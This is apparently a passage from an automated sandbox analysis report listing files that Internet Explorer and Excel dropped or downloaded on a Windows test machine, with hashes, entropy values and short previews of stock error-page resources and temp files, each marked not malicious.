                                                                                                                                                                            File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):4113
                                                                                                                                                                            Entropy (8bit):7.9370830126943375
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                            MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                            SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                            SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                            SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/info_48.png
                                                                                                                                                                            Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ErrorPageTemplate[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2168
                                                                                                                                                                            Entropy (8bit):5.207912016937144
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                            MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                            SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                            SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                            SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ErrorPageTemplate[2]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):2168
                                                                                                                                                                            Entropy (8bit):5.207912016937144
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                            MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                            SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                            SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                            SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
                                                                                                                                                                            Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\bullet[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):447
                                                                                                                                                                            Entropy (8bit):7.304718288205936
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                            MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                            SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                            SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                            SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\down[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):748
                                                                                                                                                                            Entropy (8bit):7.249606135668305
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                            MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                                                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\errorPageStrings[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):4720
                                                                                                                                                                            Entropy (8bit):5.164796203267696
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                                                                                                                                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\http_404[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6495
                                                                                                                                                                            Entropy (8bit):3.8998802417135856
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                            MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                            SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                            SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                            SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\http_404[2]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6495
                                                                                                                                                                            Entropy (8bit):3.8998802417135856
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                            MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                            SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                            SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                            SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\info_48[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4113
                                                                                                                                                                            Entropy (8bit):7.9370830126943375
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                            MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                            SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                            SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                            SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\FAD40000
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):328089
                                                                                                                                                                            Entropy (8bit):7.9252965238230955
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:sB5vetPVUNAqybs1dddqbEDDtanTaZPXtFL+:M5vetPfqybs1dddqKtan4Xvy
                                                                                                                                                                            MD5:0DA9B4479B2791D67F80E10B35A01888
                                                                                                                                                                            SHA1:A9299233EDB4B117F899CA30CF07C93E75F7274A
                                                                                                                                                                            SHA-256:EA6F9AC28054EB576199219FEC033814EFCE3DF7069E181B1DD55D018B11691B
                                                                                                                                                                            SHA-512:F1B2F37F68970DF37FA70094558223CBDA8C4A4246758F6353EAB75E84FA4ECDB8E5CF1D7C9F1B4D83559026942E4C4B73A47834DE03AB9E8CA50DA76BB4719E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .UKO.1..W.?.|.v.@..*..@..T...{.5.K.....,)AK..rYy=..3....-...1.r.e..Uh....Z...g..U..J..b.H.lr.e|..HUB[jY....9...P.<....` ..0....f.OF.o\8...:f.6._...t...i{......W.T..........!%0.....x........|.K...$d9C...5%.......@..N..Jbu.!^.I...O...7.I.KC5...:.....]Z..b...7....%.l.ey|.nF.ey......7....{.q...n:U....&..|@....f...1]F..O+.[(4;.).5..u=$........_1.........C.x..x..x.{.m..3...S.......D...'".Q.z..M..b.e.n7./Q.h..........PK..........!.F...............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):89
                                                                                                                                                                            Entropy (8bit):4.48547855515619
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:oVXUWW+USnRAW8JOGXnEWW+USTn:o9URGnR9qERGT
                                                                                                                                                                            MD5:2004B1BBDAEBF298C66DA5A385D949D7
                                                                                                                                                                            SHA1:219786CBC1D8CCAF9C94935DBC53B3572749538D
                                                                                                                                                                            SHA-256:ECD6FF6CC2230F4D5166D802F541DFE93248543BFB863BB54370AC61C04AA15D
                                                                                                                                                                            SHA-512:6B0E942495B2901907991F133E65C37B0FE4F8DD5BC108D1165053B5EF84EF5CC07892796FB2F569C698B5F76BCFB33F0487A4151FAFC9129012462FE27B21EA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: [2021/05/03 19:50:33.174] Latest deploy version: ..[2021/05/03 19:50:33.174] 11.211.2 ..
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF4DA5B59B47D462E7.TMP
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):12933
                                                                                                                                                                            Entropy (8bit):0.40734914888761126
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:c9lCg5/9lCgeK9l26an9l26an9l8fR3F9l8fRV9lTqLBfn3r:c9lLh9lLh9lIn9lIn9lo19loV9lWLt3r
                                                                                                                                                                            MD5:66AD2DA0FFD689F8332E81AE155AB5EF
                                                                                                                                                                            SHA1:FC48340F1F7AC89A943EEA1F1C2F2F0F5AA61FFD
                                                                                                                                                                            SHA-256:C3A0A97E7020E7758B5C1C0DD02E11B907F2D53AFAA045317DEBDAFCCBC15AE8
                                                                                                                                                                            SHA-512:BB16900B7A4EEB2C716B8246B5C896CEA90AEA10CFB4D8F6A163E153732C90CAE2DA34BA28850A1462A0A3A9C9AF5A3EE9BBAA0D1B698029325248F36452BF31
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF596DB306FCC36A54.TMP
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):12933
                                                                                                                                                                            Entropy (8bit):0.4053015674628694
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:c9lCg5/9lCgeK9l26an9l26an9l8fRVF9l8fRP9lTq/c+CaL+8Z:c9lLh9lLh9lIn9lIn9loP9loP9lW35
                                                                                                                                                                            MD5:E97475C3C1405B613D0AD71B5804D71B
                                                                                                                                                                            SHA1:A1CBB28B7C591DD9F068A73ED8B7819CB5BB5D38
                                                                                                                                                                            SHA-256:D07A3F3BB9F5B200BAB3D45CEB5678AA7A42D0BD61E077EB4CAD00DFC5984437
                                                                                                                                                                            SHA-512:DE6ECF07F443C6BD4C000D6C2C0299A2261385E28E08B7C5192EC2FC16FC134D9E901BC7931FA2BF0A193E905E8BB2C9E1678DA055172248C2F1306CB15C0C92
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFC4112F6E645ECEC7.TMP
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40193
                                                                                                                                                                            Entropy (8bit):0.6773372010569979
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:kBqoxKAuqR+WQKjQ9nN/Dhfx9nN/DhfxynN/Dhfxf:kBqoxKAuqR+WQKjQ9phXph0phR
                                                                                                                                                                            MD5:B23F19C83A219765CE853B3054D5A626
                                                                                                                                                                            SHA1:8D2CCE0C2F2D28F0FD11498538B8A35EFDA828E6
                                                                                                                                                                            SHA-256:C276B80EA5EB53D5EE5B121ED87E99697077B27ED84A09893E129D10872022A5
                                                                                                                                                                            SHA-512:09253A921B0C3AD873A2BF13408C7A3F7A30475C67E4EE7E959A98D563F8E1D94498622D1879A3AB8BB4C15F215531B42F632976CF206D7427B8CD2D509FD488
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFD87FF62AF0A6347E.TMP
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):12933
                                                                                                                                                                            Entropy (8bit):0.40709120417340766
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:c9lLh9lLh9lIn9lIn9lo/9lo/9lW1mWJD:kBqoIg+1mWJD
                                                                                                                                                                            MD5:732945D7378D99607C39FF5D179B894A
                                                                                                                                                                            SHA1:BD5EC7C8DBF4037E9E2AEBE00E9F26B7FFB5A65E
                                                                                                                                                                            SHA-256:30BADA595841D2C499E0E66F34E674F8FB294D2644DD033890D888D49A68EEEE
                                                                                                                                                                            SHA-512:530BE9664FF3E7EC184CE2693B675D0756E8BFEDDDEF91EF3DBDAF8FC556E2464F5C403C0E4C7E1673B2025F8618C8F1A3FA33AD0692C1B54CFE7CF39BDAC75A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFE7296AD5C85F4BE9.TMP
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40145
                                                                                                                                                                            Entropy (8bit):0.6713572692688405
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:kBqoxKAuqR+Z3lUXtU0NFNqtU0NFNqd0NFNqO:kBqoxKAuqR+Z3lUXtU08U0s0Z
                                                                                                                                                                            MD5:F8326EF40399170003450B8860BE7AB7
                                                                                                                                                                            SHA1:6EE5147E012E545AA4D23ECE008A6264B611CA70
                                                                                                                                                                            SHA-256:FF71BBAEB602B268A0F312D6B6EC8D0F0C780F13EF3BB2463473A336E55943A0
                                                                                                                                                                            SHA-512:0CB3A57437527357454F3B416127FD9C14BCC78E386A86F61B1B272330726CACC893A56313E806C19ADCD72B41A51CF6BBF9C273A137EF74DC0AB04331D4D726
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFEF08F5C4CE8758CE.TMP
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40225
                                                                                                                                                                            Entropy (8bit):0.684855061118958
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:kBqoxKAuqR+1bZILKsWjB1XLsWjB1X4sWjB1X1:kBqoxKAuqR+1bZILKpzXLpzX4pzX1
                                                                                                                                                                            MD5:0A82DCAAB853CB2F305ABE124B0277C6
                                                                                                                                                                            SHA1:E04239EBAB6A852461F2DCF030E393E60BCE30D7
                                                                                                                                                                            SHA-256:6FE8B3FD065A6446A3BC62EC7054B251C39CCD3B03EDAA4ABA7827F284013112
                                                                                                                                                                            SHA-512:9870C1BA3BB88AB2B25C2B319305E2C296A2E4A4BADA0CF073EE3188CF53199D974298F8A9BA339097B2EB4747575DE7CD87666EDD414EECBA01ED1A37F2AA9F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
